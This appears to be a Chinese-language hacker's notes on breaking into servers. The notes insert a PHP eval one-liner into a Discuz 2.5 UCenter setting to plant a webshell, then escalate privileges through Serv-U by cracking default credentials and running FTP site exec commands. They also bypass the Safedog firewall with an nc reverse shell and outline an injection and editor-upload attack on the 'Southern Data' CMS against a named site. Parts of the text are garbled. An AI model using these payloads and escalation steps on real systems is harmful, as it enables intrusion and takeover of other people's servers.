DZ2.5后台拿webshell
进入后台,有个站长,ucenter设置,IP哪里插入一句话
下面是一句话源代码:
貌似被转换了一下 例如XX\\');eval($_POST[a]?>;//XX
对就这个被加了单引号,连接../config/config_ucenter.php
适合社工管理员以后拿webshell
SU提权
通过菜刀连入,扫描端口,开放43958
首先寻找目录这就是ser-u的目录
点击ini文件查看默认账号和密码
去md5网站破解这里类型选择serv-u
这个网站的ftp提权是不成功的,因为ftp不能正常登陆
进行serv-u提权
路径写su的实际路径,他开了3389可以直接连连看
提权后,破解账户哈希
成功绕过安全狗防火墙提权进服务器
主要是绕过安全狗
wscript.shell关闭,看来asp下执行命令只能借助第三方
看一下aspx的马,运行cmd能运行普通命令,不能运行高级命令,
在看一下,试试080提权,试过,只要执行就会直接导致服务器重启
iis6.0刚卡斯hi还执行一下命令加账户被安全狗屏蔽,执行替换那个Seth命令,不成功,version=6.3.0.1
想用su提权,先看ftp提权,命令:quote site exec net user
显示501表示没有权限,所以ftp提取失败
杀毒软件提示,被阻止了命令运行,但这也说明了SU还是有漏洞的
来让我们替换一下Seth,看看效果,没有提示狗,则证明su的最高权限
总结思路
绕狗的方法:nc反弹43958 有没有必要转发
各种0day提权,
喜欢端口提权 1433 3306 43958 4899
一者他是正则通讯,服务器会主动链接外部网络,这样就绕过防火墙
360杀毒为什么强大?行为检测是根据你的判断程序是否合法,这也是前段时间被曝光的
多种方法测试南方数据漏洞实战演示
www.xpm.com.cn 南方数据
1.注入点:
2.登陆后台
3.利用编辑器上传:访问admin/siuthidceditor/admin_style.asp